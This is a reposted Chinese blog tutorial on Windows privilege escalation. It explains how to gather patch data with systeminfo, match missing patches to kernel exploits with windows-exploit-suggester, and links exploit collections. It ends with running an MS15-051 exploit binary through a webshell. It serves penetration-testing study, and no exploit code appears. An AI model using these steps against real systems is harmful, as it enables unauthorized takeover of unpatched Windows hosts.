提权-EXP

其他 2020-03-10 16:17:32 阅读次数: 0

目录

EXP提权

EXP提权适合补丁未打全的系统
如果补丁打全了,考虑中间件提权
补充:
本地提权:需要交互式的shell,即需要远程登录服务器后运行提权
远程提权:无需交互

收集补丁信息

systeminfo

搜索适合的EXP

secwiki的exp汇总

https://github.com/SecWiki/windows-kernel-exploits

零组的exp汇总

http://www.0-sec.org/%E6%8F%90%E6%9D%83EXP/Win/2.html

在线匹配EXP

http://blog.neargle.com/win-powerup-exp-index/#

零组辅助脚本匹配EXP

http://www.0-sec.org/%E6%8F%90%E6%9D%83EXP/Win/1.html
https://github.com/ianxtianxt/win-exp-

  1. systeminfo信息输出至文本中
    systeminfo >> systeminfo.txt

down下本机

  1. 脚本匹配
    注意先更新数据
    python2 windows-exploit-suggester.py --update
    数据与sys信息匹配
    python2 windows-exploit-suggester.py --database 2020-03-10-mssb.xls --systeminfo systeminfo.txt

EXP序列号及地址皆已给出

提权实验

MS15-051

  1. 上传合适的exe

  2. 提权
    webshell运行ms15-051x64.exe "whoami"

猜你喜欢

转载自www.cnblogs.com/Rain99-/p/12456289.html
今日推荐
周排行
回表和覆盖索引
设计模式-template method
GLES3.0中文API-glDrawElements
Java中类之间的关系
iPhone应用提交流程:如何将App程序发布到App Store
关于c内联函数不能有循环递归
移动端点击事件、滑动不可用的坑~~
16,SSH远程登录服务
SqlDataReader C#数据库查询结果数据
痴情研究java内存中的对象
每日归档
更多
2024-06-17(0)
2024-06-16(0)
2024-06-15(0)
2024-06-14(0)
2024-06-13(0)
2024-06-12(0)
2024-06-11(0)
2024-06-10(0)
2024-06-09(0)
2024-06-08(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022